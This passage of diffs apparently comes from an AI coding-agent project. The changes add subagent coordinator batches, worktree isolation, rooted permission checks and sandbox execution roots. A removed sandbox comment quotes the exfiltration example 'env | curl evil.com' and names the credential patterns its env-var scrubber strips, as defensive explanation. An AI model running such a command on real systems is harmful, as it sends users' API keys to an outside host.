+                        "task_id: {}\nstate: cancelled\n\nreason: {}",
+                        args.task_id, reason
                     )),
                 },
                 None => Err(ToolError::Msg(format!(

--- a/src/agent/tools/task_status.rs
+++ b/src/agent/tools/task_status.rs
@@ -81,6 +81,16 @@ impl Tool for TaskStatusTool {
         check_perm(&self.permission, &self.ask_tx, "task_status", &args.task_id).await?;
         let wait = args.wait.unwrap_or(false);
 
+        if let Some(generation) = self
+            .bg_store
+            .task_is_awaiting_coordinator_delivery(&args.task_id)
+        {
+            return Ok(format!(
+                "Task {} belongs to active coordinator batch {}; its result will be delivered at batch reconciliation.",
+                args.task_id, generation
+            ));
+        }
+
         if wait {
             // Hard cap so a stuck subagent (e.g. LLM hang) can't hold the
             // parent turn open forever. The agent should rely on the
@@ -196,6 +206,25 @@ mod tests {
             .unwrap();
         assert!(result.contains("state: completed"));
         assert!(result.contains("result text"));
+    }
+
+    #[tokio::test]
+    async fn coordinator_batch_hides_terminal_task_payload_until_delivery() {
+        let store = BackgroundStore::new();
+        store.enable_coordinator(crate::config::SubagentDispatchStrategy::Full);
+        store.insert_coordinated("first".to_string());
+        store.insert_coordinated("second".to_string());
+        store.notify("first", TaskState::Completed("secret result".to_string()));
+
+        let result = TaskStatusTool::new(store)
+            .call(TaskStatusArgs {
+                task_id: "first".to_string(),
+                wait: Some(true),
+            })
+            .await
+            .unwrap();
+        assert!(result.contains("coordinator batch"));
+        assert!(!result.contains("secret result"));
     }
 
     #[tokio::test]

--- a/src/agent/tools/write.rs
+++ b/src/agent/tools/write.rs
@@ -9,7 +9,9 @@ use rig::tool::Tool;
 
 use crate::agent::agent_loop::tool_input_repair::with_contract_hint;
 use crate::agent::tools::cache::ToolCache;
-use crate::agent::tools::{AskSender, PermCheck, ToolError, WriteArgs, require_and_resolve};
+use crate::agent::tools::{
+    AskSender, PermCheck, ToolError, ToolRoot, WriteArgs, require_and_resolve_rooted,
+};
 #[cfg(feature = "lsp")]
 use crate::lsp::diagnostic;
 #[cfg(feature = "lsp")]
@@ -25,6 +27,7 @@ pub struct WriteTool {
     pub permission: Option<PermCheck>,
     pub ask_tx: Option<AskSender>,
     cache: Option<ToolCache>,
+    root: Option<ToolRoot>,
     /// When set, the tool touches the file on the LSP server after writing
     /// and appends any resulting diagnostic block to its output. `None`
     /// reproduces the pre-LSP behaviour exactly.
@@ -39,6 +42,7 @@ impl WriteTool {
             permission,
             ask_tx,
             cache: None,
+            root: None,
             #[cfg(feature = "lsp")]
             lsp_manager: None,
         }
@@ -54,9 +58,14 @@ impl WriteTool {
             permission,
             ask_tx,
             cache: Some(cache),
+            root: None,
             #[cfg(feature = "lsp")]
             lsp_manager,
         }
+    }
+    pub fn rooted(mut self, root: ToolRoot) -> Self {
+        self.root = Some(root);
+        self
     }
 }
 
@@ -94,7 +103,8 @@ impl Tool for WriteTool {
         // Audit H12: require absolute + pin file operations to the canonical
         // path the permission check ran against, so a symlink swap can't
         // redirect the write to an unauthorized target.
-        let resolved_path = require_and_resolve(
+        let resolved_path = require_and_resolve_rooted(
+            self.root.as_ref(),
             &self.permission,
             &self.ask_tx,
             "write",

--- a/src/config/mod.rs
+++ b/src/config/mod.rs
@@ -652,6 +652,22 @@ impl<'de> Deserialize<'de> for SandboxConfig {
     }
 }
 
+#[derive(Debug, Clone, Copy, PartialEq, Eq, Default)]
+pub enum SubagentDispatchStrategy {
+    #[default]
+    Off,
+    Optional,
+    Full,
+}
+
+#[derive(Debug, Clone, Copy, PartialEq, Eq, Default)]
+pub enum SubagentWriteIsolation {
+    #[default]
+    Auto,
+    Worktree,
+    Serialize,
+}
+
 #[derive(Debug, Default, Deserialize)]
 #[serde(default)]
 pub struct Config {
@@ -771,6 +787,11 @@ pub struct Config {
     pub incremental_checkpoint: Option<bool>,
     /// Optional provider for sub-agents (`task` tool).
     pub subagent_provider: Option<String>,
+    /// Coordinator policy for tiered subagent dispatch. Missing, empty, and
+    /// unknown values keep the legacy uncoordinated behavior.
+    pub subagent_dispatch_strategy: Option<String>,
+    /// Writer isolation policy for coordinated read-write subagents.
+    pub subagent_write_isolation: Option<String>,
     /// Optional provider for the F6 in-loop critic (tier 3). When set,
     /// the verifier escalates to a bounded LLM critique at finalization
     /// on substantive runs. Unset (default) = no critic, no cost.
@@ -987,6 +1008,50 @@ impl Config {
             return Some((alias, ProviderEntry::default()));
         }
         None
+    }
+
+    pub fn resolve_subagent_dispatch_strategy(&self) -> SubagentDispatchStrategy {
+        match self
+            .subagent_dispatch_strategy
+            .as_deref()
+            .map(str::trim)
+            .map(str::to_ascii_lowercase)
+            .as_deref()
+        {
+            None | Some("") | Some("off") => SubagentDispatchStrategy::Off,
+            Some("optional") => SubagentDispatchStrategy::Optional,
+            Some("full") => SubagentDispatchStrategy::Full,
+            Some(other) => {
+                tracing::warn!(
+                    target: "dirge::config",
+                    strategy = %other,
+                    "unknown subagent_dispatch_strategy; disabling coordinator mode"
+                );
+                SubagentDispatchStrategy::Off
+            }
+        }
+    }
+
+    pub fn resolve_subagent_write_isolation(&self) -> SubagentWriteIsolation {
+        match self
+            .subagent_write_isolation
+            .as_deref()
+            .map(str::trim)
+            .map(str::to_ascii_lowercase)
+            .as_deref()
+        {
+            None | Some("") | Some("auto") => SubagentWriteIsolation::Auto,
+            Some("worktree") => SubagentWriteIsolation::Worktree,
+            Some("serialize") => SubagentWriteIsolation::Serialize,
+            Some(other) => {
+                tracing::warn!(
+                    target: "dirge::config",
+                    isolation = %other,
+                    "unknown subagent_write_isolation; using auto"
+                );
+                SubagentWriteIsolation::Auto
+            }
+        }
     }
 
     /// Resolve the critic's system preamble: the config override when set,
@@ -1676,6 +1741,49 @@ mod tests {
         assert_eq!(cfg.resolve_code_review_mode(), CodeReviewMode::Advisory);
         let cfg: Config = serde_json::from_str(r#"{ "code_review": "   " }"#).unwrap();
         assert_eq!(cfg.resolve_code_review_mode(), CodeReviewMode::Advisory);
+    }
+
+    #[test]
+    fn resolves_subagent_dispatch_strategy_tolerantly() {
+        let resolve = |value: Option<&str>| {
+            Config {
+                subagent_dispatch_strategy: value.map(str::to_string),
+                ..Default::default()
+            }
+            .resolve_subagent_dispatch_strategy()
+        };
+
+        assert_eq!(resolve(None), SubagentDispatchStrategy::Off);
+        assert_eq!(
+            resolve(Some("  OPTIONAL ")),
+            SubagentDispatchStrategy::Optional
+        );
+        assert_eq!(resolve(Some("full")), SubagentDispatchStrategy::Full);
+        assert_eq!(resolve(Some("")), SubagentDispatchStrategy::Off);
+        assert_eq!(resolve(Some("unknown")), SubagentDispatchStrategy::Off);
+    }
+
+    #[test]
+    fn resolves_subagent_write_isolation_tolerantly() {
+        let resolve = |value: Option<&str>| {
+            Config {
+                subagent_write_isolation: value.map(str::to_string),
+                ..Default::default()
+            }
+            .resolve_subagent_write_isolation()
+        };
+
+        assert_eq!(resolve(None), SubagentWriteIsolation::Auto);
+        assert_eq!(
+            resolve(Some(" worktree ")),
+            SubagentWriteIsolation::Worktree
+        );
+        assert_eq!(
+            resolve(Some("SERIALIZE")),
+            SubagentWriteIsolation::Serialize
+        );
+        assert_eq!(resolve(Some("")), SubagentWriteIsolation::Auto);
+        assert_eq!(resolve(Some("unknown")), SubagentWriteIsolation::Auto);
     }
 
     #[test]

--- a/src/context/agent_defs.rs
+++ b/src/context/agent_defs.rs
@@ -122,6 +122,7 @@ pub struct SubagentToolPolicy {
     pub allow: Vec<String>,
     pub deny: Vec<String>,
     pub max_turns: Option<usize>,
+    pub timeout_secs: Option<u64>,
 }
 
 /// `config.json` `agents.<name>.subagent` block (serde). Mirrors the `.md`
@@ -134,6 +135,7 @@ pub struct SubagentConfig {
     pub allow: Option<Vec<String>>,
     pub deny: Option<Vec<String>>,
     pub max_turns: Option<usize>,
+    pub timeout_secs: Option<u64>,
 }
 
 /// Map a tier name to its enum. Tolerant: known names map to variants,
@@ -248,6 +250,7 @@ impl AgentConfig {
                 allow: s.allow.unwrap_or_default(),
                 deny: s.deny.unwrap_or_default(),
                 max_turns: s.max_turns,
+                timeout_secs: s.timeout_secs,
             },
             source,
         }
@@ -386,6 +389,7 @@ pub(crate) fn parse_agent_md(name: &str, raw: &str, source: AgentSource) -> Agen
     let mut sub_allow: Option<Vec<String>> = None;
     let mut sub_deny: Option<Vec<String>> = None;
     let mut sub_max_turns: Option<usize> = None;
+    let mut sub_timeout_secs: Option<u64> = None;
     for line in front.lines() {
         let line = line.trim();
         if line.is_empty() || line.starts_with('#') {
@@ -404,6 +408,7 @@ pub(crate) fn parse_agent_md(name: &str, raw: &str, source: AgentSource) -> Agen
             "allow_tools" => allow = Some(parse_inline_list(value)),
             "subagent_tools" if !value.is_empty() => sub_tier = Some(value.to_string()),
             "subagent_max_turns" => sub_max_turns = value.parse::<usize>().ok(),
+            "subagent_timeout_secs" => sub_timeout_secs = value.parse::<u64>().ok(),
             "subagent_allow" => sub_allow = Some(parse_inline_list(value)),
             "subagent_deny" => sub_deny = Some(parse_inline_list(value)),
             _ => {}
@@ -418,6 +423,7 @@ pub(crate) fn parse_agent_md(name: &str, raw: &str, source: AgentSource) -> Agen
         allow: sub_allow.unwrap_or_default(),
         deny: sub_deny.unwrap_or_default(),
         max_turns: sub_max_turns,
+        timeout_secs: sub_timeout_secs,
     };
     def
 }

--- a/src/extras/git_worktree/mod.rs
+++ b/src/extras/git_worktree/mod.rs
@@ -128,6 +128,92 @@ fn validate_branch_name(name: &str) -> Result<(), String> {
     Ok(())
 }
 
+fn validate_component(name: &str) -> Result<(), String> {
+    if name.is_empty() || name == "." || name == ".." || name.contains('/') || name.contains('\\') {
+        return Err(format!(
+            "directory name {name:?} must be a safe single path component"
+        ));
+    }
+    Ok(())
+}
+
+pub fn create_at(
+    main_repo: &Path,
+    parent_dir: &Path,
+    branch: &str,
+    directory_name: &str,
+) -> Result<WorktreeInfo, String> {
+    validate_branch_name(branch)?;
+    validate_component(directory_name)?;
+    let main_repo = main_repo
+        .canonicalize()
+        .map_err(|e| format!("failed to resolve main repository: {e}"))?;
+    let parent_dir = parent_dir
+        .canonicalize()
+        .map_err(|e| format!("failed to resolve worktree parent: {e}"))?;
+    let worktree_path = parent_dir.join(directory_name);
+    let output = Command::new("git")
+        .current_dir(&main_repo)
+        .arg("-C")
+        .arg(&main_repo)
+        .args(["worktree", "add", "-b", branch, "--"])
+        .arg(&worktree_path)
+        .output()
+        .map_err(|e| format!("failed to run git: {e}"))?;
+    if !output.status.success() {
+        return Err(format!(
+            "git worktree add failed: {}",
+            String::from_utf8_lossy(&output.stderr).trim()
+        ));
+    }
+    let worktree_path = worktree_path.canonicalize().map_err(|e| {
+        let _ = remove_worktree(&main_repo, &worktree_path);
+        format!("failed to resolve worktree path: {e}")
+    })?;
+    Ok(WorktreeInfo {
+        branch: branch.to_string(),
+        worktree_path,
+        main_repo_path: main_repo,
+    })
+}
+
+pub fn repo_is_dirty(repo: &Path) -> Result<bool, String> {
+    is_dirty(repo)
+}
+
+#[allow(dead_code)]
+pub fn head_commit(repo: &Path) -> Result<String, String> {
+    git_in(repo, &["rev-parse", "HEAD"])
+}
+
+#[allow(dead_code)]
+pub fn worktree_is_dirty(info: &WorktreeInfo) -> Result<bool, String> {
+    is_dirty(&info.worktree_path)
+}
+
+#[allow(dead_code)]
+pub fn worktree_commits_since(info: &WorktreeInfo, base: &str) -> Result<Vec<String>, String> {
+    validate_branch_name(base)?;
+    let output = git_in(
+        &info.worktree_path,
+        &["log", "--format=%H", &format!("{base}..HEAD")],
+    )?;
+    Ok(output
+        .lines()
+        .filter(|line| !line.is_empty())
+        .map(str::to_string)
+        .collect())
+}
+
+#[allow(dead_code)]
+pub fn remove_worktree_if_clean(info: &WorktreeInfo) -> Result<bool, String> {
+    if worktree_is_dirty(info)? {
+        return Ok(false);
+    }
+    remove_worktree(&info.main_repo_path, &info.worktree_path)?;
+    Ok(true)
+}
+
 pub fn create(name: &str) -> Result<(PathBuf, WorktreeInfo), String> {
     validate_branch_name(name)?;
     let target = format!("../{}", name);

--- a/src/extras/git_worktree/mod.rs
+++ b/src/extras/git_worktree/mod.rs
@@ -207,7 +207,9 @@ pub fn worktree_commits_since(info: &WorktreeInfo, base: &str) -> Result<Vec<Str
 
 #[allow(dead_code)]
 pub fn remove_worktree_if_clean(info: &WorktreeInfo) -> Result<bool, String> {
-    if worktree_is_dirty(info)? {
+    if worktree_is_dirty(info)?
+        || !worktree_commits_since(info, &head_commit(&info.main_repo_path)?)?.is_empty()
+    {
         return Ok(false);
     }
     remove_worktree(&info.main_repo_path, &info.worktree_path)?;
@@ -518,6 +520,24 @@ mod merge_tests {
         assert!(
             err.contains("uncommitted"),
             "error names the dirty state: {err}"
+        );
+        let _ = std::fs::remove_dir_all(&root);
+    }
+
+    #[test]
+    fn committed_worktree_is_retained_by_clean_only_removal() {
+        let (info, root) = setup();
+        write(&info.worktree_path.join("committed.txt"), "retain me\n");
+        git(&info.worktree_path, &["add", "."]);
+        git(&info.worktree_path, &["commit", "-m", "retain worktree"]);
+
+        assert!(
+            !remove_worktree_if_clean(&info).expect("retention check succeeds"),
+            "committed worktree must remain available for salvage"
+        );
+        assert!(
+            info.worktree_path.exists(),
+            "committed checkout is retained"
         );
         let _ = std::fs::remove_dir_all(&root);
     }

--- a/src/extras/memory_retrieval_eval.rs
+++ b/src/extras/memory_retrieval_eval.rs
@@ -23,8 +23,6 @@
 //! the corpus/scorer are the reusable pieces a future real-embedder run wires
 //! its own `search` closure into.
 
-#![cfg(test)]
-
 use crate::extras::dirge_paths::ProjectPaths;
 use crate::extras::memory_db::{MemoryKind, SqliteMemoryStore};
 

--- a/src/main.rs
+++ b/src/main.rs
@@ -1,8 +1,8 @@
 mod agent;
 mod auth;
 /// Shared spawn hardening (setsid + process-group SIGKILL guard) for the
-/// stdio child processes: LSP servers, DAP adapters, MCP command servers.
-#[cfg(any(feature = "lsp", feature = "dap", feature = "mcp"))]
+/// stdio child processes and bash subtrees.
+#[cfg(unix)]
 mod child_guard;
 mod cli;
 mod compression;

--- a/src/main.rs
+++ b/src/main.rs
@@ -2,7 +2,6 @@ mod agent;
 mod auth;
 /// Shared spawn hardening (setsid + process-group SIGKILL guard) for the
 /// stdio child processes and bash subtrees.
-#[cfg(unix)]
 mod child_guard;
 mod cli;
 mod compression;

--- a/src/main.rs
+++ b/src/main.rs
@@ -1705,8 +1705,13 @@ async fn main() -> anyhow::Result<()> {
                         format!("{} ({:?})", definition.name, definition.subagent.tier)
                     })
                     .collect::<Vec<_>>();
+                let strategy_name = match coordinator_strategy {
+                    config::SubagentDispatchStrategy::Optional => "optional",
+                    config::SubagentDispatchStrategy::Full => "full",
+                    config::SubagentDispatchStrategy::Off => "off",
+                };
                 let diagnostic = format!(
-                    "subagent_dispatch_strategy=full requires both coordinator tiers and enabled tools. found: {}; missing: {}{}",
+                    "subagent_dispatch_strategy={strategy_name} requires both coordinator tiers and enabled tools. found: {}; missing: {}{}",
                     if found.is_empty() {
                         "none".to_string()
                     } else {

--- a/src/main.rs
+++ b/src/main.rs
@@ -1277,6 +1277,7 @@ async fn main() -> anyhow::Result<()> {
                 // the unchanged btw path; `Some` selects the tooled fork.
                 let tool_allow = agent::tools::task::resolve_subagent_allow(&def.subagent);
                 let max_turns = agent::tools::task::resolve_subagent_max_turns(&def.subagent);
+                let timeout = agent::tools::task::resolve_subagent_timeout(&def.subagent);
                 (
                     def.name.clone(),
                     agent::tools::task::SubagentRoute {
@@ -1284,6 +1285,8 @@ async fn main() -> anyhow::Result<()> {
                         preamble: def.prompt.clone(),
                         tool_allow,
                         max_turns,
+                        timeout,
+                        tier: def.subagent.tier.clone(),
                     },
                 )
             })
@@ -1685,6 +1688,47 @@ async fn main() -> anyhow::Result<()> {
                         .await;
                     }
                 }
+            }
+        }
+
+        let coordinator_strategy = cfg.resolve_subagent_dispatch_strategy();
+        if coordinator_strategy != config::SubagentDispatchStrategy::Off {
+            let profiles = agent::tools::task::resolve_coordinator_profiles(&context.agent_defs);
+            let missing_readonly = profiles.readonly.is_empty();
+            let missing_readwrite = profiles.readwrite.is_empty();
+            let tools_disabled = cli.resolve_no_tools(&cfg);
+            if tools_disabled || missing_readonly || missing_readwrite {
+                let found = context
+                    .agent_defs
+                    .iter()
+                    .map(|definition| {
+                        format!("{} ({:?})", definition.name, definition.subagent.tier)
+                    })
+                    .collect::<Vec<_>>();
+                let diagnostic = format!(
+                    "subagent_dispatch_strategy=full requires both coordinator tiers and enabled tools. found: {}; missing: {}{}",
+                    if found.is_empty() {
+                        "none".to_string()
+                    } else {
+                        found.join(", ")
+                    },
+                    if missing_readonly { "readonly" } else { "" },
+                    if missing_readwrite {
+                        if missing_readonly {
+                            ", readwrite"
+                        } else {
+                            "readwrite"
+                        }
+                    } else {
+                        ""
+                    },
+                );
+                if coordinator_strategy == config::SubagentDispatchStrategy::Full {
+                    anyhow::bail!(diagnostic);
+                }
+                eprintln!("warning: {diagnostic}; disabling coordinator mode");
+            } else if let Some(store) = bg_store.as_ref() {
+                store.enable_coordinator_with_profiles(coordinator_strategy, profiles);
             }
         }
 

--- a/src/permission/checker.rs
+++ b/src/permission/checker.rs
@@ -9,6 +9,11 @@ use crate::permission::{PermissionConfig, SecurityMode};
 
 pub type PermCheck = Arc<Mutex<PermissionChecker>>;
 
+pub fn rooted_perm_check(checker: &PermCheck, working_dir: std::path::PathBuf) -> PermCheck {
+    let checker = checker.lock().unwrap().for_working_dir(working_dir);
+    Arc::new(Mutex::new(checker))
+}
+
 /// Synchronous decision result. A `CheckResult`-returning query API
 /// over the engine, used by the test oracle (`check`/`check_path`
 /// exercise the engine across ~1700 assertions). No production caller
@@ -64,6 +69,7 @@ fn effect_to_result(decision: engine::types::Decision) -> CheckResult {
 /// engine; the checker just normalizes inputs, holds the working
 /// directory + mode, and keeps a display copy of the session allowlist.
 pub struct PermissionChecker {
+    config: PermissionConfig,
     working_dir: String,
     /// Cached canonical form of `working_dir`. Used by
     /// `is_external_path` (a live API consumed by the MCP tool) to
@@ -111,6 +117,7 @@ impl PermissionChecker {
         let engine = engine::Engine::from_config(config);
 
         PermissionChecker {
+            config: config.clone(),
             working_dir,
             working_dir_canonical,
             session_allowlist: Vec::new(),
@@ -119,6 +126,17 @@ impl PermissionChecker {
             approval_fn: None,
             engine,
         }
+    }
+
+    /// Build a fresh checker for an isolated worktree without sharing mutable
+    /// session grants or retry counters with the parent session.
+    pub fn for_working_dir(&self, working_dir: std::path::PathBuf) -> Self {
+        let mut checker = Self::new(&self.config, self.mode, Some(working_dir));
+        checker.set_prompt_deny_tools(self.prompt_deny_tools.clone());
+        if let Some(approval_fn) = self.approval_fn() {
+            checker.set_approval_fn(approval_fn);
+        }
+        checker
     }
 
     /// dirge-0g6i: install the LLM auto-approval evaluator (built from

--- a/src/permission/checker.rs
+++ b/src/permission/checker.rs
@@ -237,7 +237,11 @@ impl PermissionChecker {
                 // complex command as a prompt — not a head-rule allow — and
                 // never disagrees with enforcement (it used to miss heredocs).
                 "bash" | "shell" => {
-                    if crate::semantic::adapters::bash::command_is_complex(input) {
+                    #[cfg(feature = "semantic-bash")]
+                    let complex = crate::semantic::adapters::bash::command_is_complex(input);
+                    #[cfg(not(feature = "semantic-bash"))]
+                    let complex = crate::agent::tools::bash::check::coarse_complex_syntax(input);
+                    if complex {
                         Resource::command_complex(input)
                     } else {
                         Resource::command(input)

--- a/src/provider/build.rs
+++ b/src/provider/build.rs
@@ -145,6 +145,9 @@ pub async fn build_agent(
             let question_tx_for_loop = question_tx.clone();
             let plan_tx_for_loop = plan_tx.clone();
             let bg_store_for_loop = bg_store.clone();
+            let coordinator_preamble = bg_store_for_loop
+                .as_ref()
+                .and_then(crate::agent::tools::background::BackgroundStore::coordinator_preamble);
             let sandbox_for_loop = sandbox.clone();
             // dirge-nw25: the loop's TaskTool gets the subagent-routed model
             // (subagent_provider when set, else the main model).
@@ -205,6 +208,12 @@ pub async fn build_agent(
                     preamble.push_str("\n\n");
                 }
                 preamble.push_str(crate::agent::prompt::DYNAMIC_TOOL_SEARCH_PROMPT);
+            }
+            if let Some(coordinator_preamble) = &coordinator_preamble {
+                if !preamble.is_empty() {
+                    preamble.push_str("\n\n");
+                }
+                preamble.push_str(&coordinator_preamble);
             }
 
             let mut agent = AnyAgent::new(

--- a/src/provider/spawn.rs
+++ b/src/provider/spawn.rs
@@ -481,6 +481,49 @@ impl AnyAgent {
         (loop_runner.into_agent_runner(), review_cache)
     }
 
+    /// Fork a subagent using a freshly built, isolated tool registry.
+    pub fn spawn_subagent_runner_with_tools(
+        &self,
+        prompt: String,
+        system_prompt: String,
+        tools: Vec<std::sync::Arc<dyn crate::agent::agent_loop::LoopTool>>,
+        child_session_id: &str,
+        max_turns: usize,
+        model_override: Option<&AnyModel>,
+    ) -> crate::agent::runner::AgentRunner {
+        use crate::agent::agent_loop::{LoopSpawnConfig, retrying_stream_fn, spawn_loop_runner};
+        use crate::agent::recovery::RecoveryPolicy;
+
+        let tool_defs = Self::tool_defs_for(&tools);
+        let provider = model_override
+            .map(AnyModel::provider_name)
+            .unwrap_or_else(|| self.provider_name())
+            .to_string();
+        let inner_stream_fn = match model_override {
+            Some(model) => model.build_stream_fn_with_filter(
+                tool_defs,
+                self.chunk_timeout,
+                Some(provider.clone()),
+                None,
+            ),
+            None => self.build_stream_fn(tool_defs),
+        };
+        let mut cfg = LoopSpawnConfig::minimal(
+            retrying_stream_fn(inner_stream_fn, RecoveryPolicy::default()),
+            prompt,
+        );
+        cfg.system_prompt = system_prompt;
+        cfg.tools = tools;
+        cfg.provider_name = Some(provider);
+        cfg.model_name = match model_override {
+            Some(model) => Some(model.name()),
+            None => Self::model_name_opt(&self.model_name),
+        };
+        cfg.session_id = Some(child_session_id.to_string());
+        cfg.max_turns = Some(max_turns);
+        spawn_loop_runner(cfg).into_agent_runner()
+    }
+
     /// Fork a filtered runner for a tooled subagent. Thin sibling of
     /// [`spawn_filtered_runner_with_cache`]: an isolated `ToolCache`, NO
     /// transcript (isolated child scope — the subagent sees only its prompt),
@@ -506,43 +549,16 @@ impl AnyAgent {
         // from the live agent (the parent's filtered registry).
         model_override: Option<&AnyModel>,
     ) -> crate::agent::runner::AgentRunner {
-        use crate::agent::agent_loop::{LoopSpawnConfig, retrying_stream_fn, spawn_loop_runner};
-        use crate::agent::recovery::RecoveryPolicy;
-
         let names: Vec<&str> = allowed.iter().map(String::as_str).collect();
         let tools = filter_loop_tools(&self.loop_tools, &names);
-        let tool_defs = Self::tool_defs_for(&tools);
-        let provider = model_override
-            .map(AnyModel::provider_name)
-            .unwrap_or_else(|| self.provider_name())
-            .to_string();
-        let inner_stream_fn = match model_override {
-            Some(m) => m.build_stream_fn_with_filter(
-                tool_defs,
-                self.chunk_timeout,
-                Some(provider.clone()),
-                None,
-            ),
-            None => self.build_stream_fn(tool_defs),
-        };
-        let stream_fn = retrying_stream_fn(inner_stream_fn, RecoveryPolicy::default());
-
-        let mut cfg = LoopSpawnConfig::minimal(stream_fn, prompt);
-        cfg.system_prompt = system_prompt;
-        cfg.tools = tools;
-        cfg.provider_name = Some(provider);
-        cfg.model_name = match model_override {
-            Some(m) => Some(m.name()),
-            None => Self::model_name_opt(&self.model_name),
-        };
-        // Forward-safe: a fresh child id, parent-linked in spirit. Inert in v1
-        // — every tool that would consume a session id is force-excluded from
-        // `allowed`, so the id attributes nothing until the dirge-mifq audit
-        // opens those tools in a later tier.
-        cfg.session_id = Some(child_session_id.to_string());
-        cfg.max_turns = Some(max_turns);
-
-        spawn_loop_runner(cfg).into_agent_runner()
+        self.spawn_subagent_runner_with_tools(
+            prompt,
+            system_prompt,
+            tools,
+            child_session_id,
+            max_turns,
+            model_override,
+        )
     }
 
     /// Phase 4.5h-2: produce a `StreamFn` from this agent's

--- a/src/sandbox/mod.rs
+++ b/src/sandbox/mod.rs
@@ -1,3 +1,4 @@
+use std::path::PathBuf;
 use std::sync::OnceLock;
 
 use regex::Regex;
@@ -60,6 +61,16 @@ impl SandboxMode {
             SandboxMode::Microvm => Some("vm"),
         }
     }
+}
+
+/// Host paths that a command may execute against instead of dirge's process
+/// working directory.
+#[derive(Debug, Clone, PartialEq, Eq)]
+pub struct SandboxExecutionRoot {
+    /// The worktree where commands start and may write files.
+    pub worktree: PathBuf,
+    /// The main repository's `.git` directory, writable for worktree metadata.
+    pub main_git_dir: PathBuf,
 }
 
 #[derive(Debug, Clone)]
@@ -297,12 +308,13 @@ impl Sandbox {
             .unwrap_or(false)
     }
 
-    fn build_command(&self, command: &str) -> Command {
+    fn build_command(&self, command: &str, root: Option<&SandboxExecutionRoot>) -> Command {
         let mut cmd = if self.mode == SandboxMode::Off {
-            // Off mode runs bash directly; it inherits the process cwd,
-            // so we don't resolve / bind one.
             let mut c = Command::new("bash");
             c.arg("-c").arg(command);
+            if let Some(root) = root {
+                c.current_dir(&root.worktree);
+            }
             c
         } else {
             // dirge-mt91: bwrap binds the working directory read-write.
@@ -310,19 +322,28 @@ impl Sandbox {
             // mid-session) the old code silently fell back to "." —
             // which bwrap resolves to an undefined path. Warn loudly;
             // the "." fallback is a last resort, not a silent default.
-            let cwd = std::env::current_dir().unwrap_or_else(|e| {
-                tracing::warn!(
-                    target: "dirge::sandbox",
-                    error = %e,
-                    "current_dir() failed while building the sandbox bind — \
-                     falling back to '.', which may bind an unexpected directory",
-                );
-                ".".into()
+            let cwd = root.map(|root| root.worktree.clone()).unwrap_or_else(|| {
+                std::env::current_dir().unwrap_or_else(|e| {
+                    tracing::warn!(
+                        target: "dirge::sandbox",
+                        error = %e,
+                        "current_dir() failed while building the sandbox bind — \
+                         falling back to '.', which may bind an unexpected directory",
+                    );
+                    ".".into()
+                })
             });
             let mut c = Command::new("bwrap");
             c.args(["--ro-bind", "/", "/", "--bind"]);
             c.arg(cwd.as_os_str());
             c.arg(cwd.as_os_str());
+            if let Some(root) = root {
+                c.args(["--bind"]);
+                c.arg(root.main_git_dir.as_os_str());
+                c.arg(root.main_git_dir.as_os_str());
+                c.args(["--chdir"]);
+                c.arg(root.worktree.as_os_str());
+            }
             c.args([
                 "--proc",
                 "/proc",
@@ -354,22 +375,6 @@ impl Sandbox {
             c
         };
 
-        // H-batch1-1 (audit fix): scrub sensitive env vars before
-        // they reach the child. Both code paths above inherit dirge's
-        // process environment by default, so `OPENROUTER_API_KEY`,
-        // `EXA_API_KEY`, `ANTHROPIC_API_KEY`, etc. flowed verbatim to
-        // every bash child — an LLM-crafted `env | curl evil.com`
-        // would have exfiltrated the user's keys. opencode/pi both
-        // scrub via an allowlist; dirge applies a pattern denylist
-        // since users have varied tooling that relies on env (cargo
-        // CARGO_*, go GOPATH, python VIRTUAL_ENV, etc.) — explicit
-        // allowlist would break those workflows.
-        //
-        // The denylist covers any var name containing KEY / SECRET /
-        // TOKEN / PASSWORD / PASS / CRED / AUTH (case-insensitive)
-        // plus a few known provider names. False positives (e.g. a
-        // legitimate `KEY_BINDINGS` env var stripped) are acceptable
-        // cost — the alternative is leaking credentials.
         scrub_env(&mut cmd);
         cmd
     }
@@ -381,7 +386,16 @@ impl Sandbox {
     /// [`tokio::process::Command`] ready for `Stdio::piped()` (no PTY, no
     /// screen takeover; the caller sets stdio + `detach_session`).
     pub(crate) fn command_for_interactive(&self, command: &str) -> Command {
-        self.build_command(command)
+        self.build_command(command, None)
+    }
+
+    /// Wrap `command` for a specific execution root.
+    pub fn wrap_command_in(&self, command: &str, root: &SandboxExecutionRoot) -> Command {
+        let mut cmd = self.build_command(command, Some(root));
+        cmd.env("GIT_TERMINAL_PROMPT", "0");
+        cmd.env("GCM_INTERACTIVE", "Never");
+        cmd.env("DEBIAN_FRONTEND", "noninteractive");
+        cmd
     }
 
     /// Wrap `command` for the sandbox backend used by the AGENT's bash tool.
@@ -389,7 +403,7 @@ impl Sandbox {
     /// tools that would otherwise prompt fail fast instead of blocking — an
     /// agent has no human at the keyboard to answer a prompt.
     pub fn wrap_command(&self, command: &str) -> Command {
-        let mut cmd = self.build_command(command);
+        let mut cmd = self.build_command(command, None);
         cmd.env("GIT_TERMINAL_PROMPT", "0");
         cmd.env("GCM_INTERACTIVE", "Never");
         cmd.env("DEBIAN_FRONTEND", "noninteractive");
@@ -409,16 +423,46 @@ impl Sandbox {
         timeout_secs: u64,
     ) -> Result<crate::agent::tools::bash::exec::InterleavedOutput, crate::agent::tools::ToolError>
     {
+        self.exec_inner(command, timeout_secs, None).await
+    }
+
+    /// Execute a command through the configured sandbox backend at `root`.
+    pub async fn exec_in(
+        &self,
+        command: &str,
+        timeout_secs: u64,
+        root: &SandboxExecutionRoot,
+    ) -> Result<crate::agent::tools::bash::exec::InterleavedOutput, crate::agent::tools::ToolError>
+    {
+        self.exec_inner(command, timeout_secs, Some(root)).await
+    }
+
+    async fn exec_inner(
+        &self,
+        command: &str,
+        timeout_secs: u64,
+        root: Option<&SandboxExecutionRoot>,
+    ) -> Result<crate::agent::tools::bash::exec::InterleavedOutput, crate::agent::tools::ToolError>
+    {
         match self.mode {
             SandboxMode::Off | SandboxMode::Bwrap => {
                 crate::agent::tools::bash::exec::run_with_timeout(
-                    self.wrap_command(command),
+                    if let Some(root) = root {
+                        self.wrap_command_in(command, root)
+                    } else {
+                        self.wrap_command(command)
+                    },
                     timeout_secs,
                 )
                 .await
             }
             #[cfg(feature = "sandbox-microvm")]
             SandboxMode::Microvm => {
+                if root.is_some() {
+                    return Err(crate::agent::tools::ToolError::Msg(
+                        "execution roots are not supported in microvm mode".to_string(),
+                    ));
+                }
                 let mut guard = self.microvm.lock().await;
                 let mv = guard.as_mut().ok_or_else(|| {
                     crate::agent::tools::ToolError::Msg(
@@ -1202,6 +1246,67 @@ mod tests {
             "expected stderr in merged output, got: {}",
             output.merged
         );
+    }
